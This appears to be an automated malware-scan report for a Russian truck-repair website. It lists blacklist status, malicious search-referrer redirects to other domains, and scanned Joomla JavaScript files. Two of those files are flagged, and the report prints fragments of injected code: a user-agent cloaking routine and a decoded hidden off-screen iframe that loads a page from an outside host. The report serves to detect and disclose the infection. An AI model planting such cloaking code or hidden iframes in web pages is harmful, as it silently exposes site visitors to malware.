Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gruzosto.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gruzosto.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://gruzosto.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: gruzosto.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 18:17:26 GMT Location: http://t87e.gu.ma/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 | malicious |
URL: http://t87e.gu.ma/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: t87e.gu.ma Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Found Connection: close Date: Thu, 25 Sep 2014 18:14:10 GMT Location: http://weras.isasecret.com Server: Apache/2.2.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | malicious |
Scanned pages/files
Request | Server response | Status |
http://gruzosto.ru/ | 200 OK Content-Length: 47410 Content-Type: text/html | clean |
http://gruzosto.ru/media/system/js/core.js | 200 OK Content-Length: 6146 Content-Type: text/javascript | clean |
http://gruzosto.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 90461 Content-Type: text/javascript | clean |
http://gruzosto.ru/media/system/js/caption.js | 200 OK Content-Length: 2721 Content-Type: text/javascript | clean |
http://gruzosto.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 240049 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^ï¿¥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value")); }});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://gruzosto.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 6085 Content-Type: text/javascript | clean |
http://gruzosto.ru/plugins/system/helix/js/totop.js | 200 OK Content-Length: 2950 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox Decoded script: window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}}); window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}}); <iframe src="http://ehehtafeg.netishyn.org/jtrjffHDAJJF7.html" style="position:absolute;left:-1409px;top:-1409px;" height="170" width="170" name="Achtamar"></iframe> Antivirus reports:
| ||
http://gruzosto.ru/modules/mod_slideshow_pro_sp2/assets/js/script.js | 200 OK Content-Length: 8509 Content-Type: text/javascript | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-dvigatelya.html | 200 OK Content-Length: 25535 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-hodovoi-chasti.html | 200 OK Content-Length: 26587 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-tormoznoj-sistemy.html | 200 OK Content-Length: 26139 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-korobki-peredach.html | 200 OK Content-Length: 27603 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-rulevogo-upravleniya.html | 200 OK Content-Length: 24487 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-vedushchego-mosta.html | 200 OK Content-Length: 21402 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-stsepleniya.html | 200 OK Content-Length: 25064 Content-Type: text/html | clean |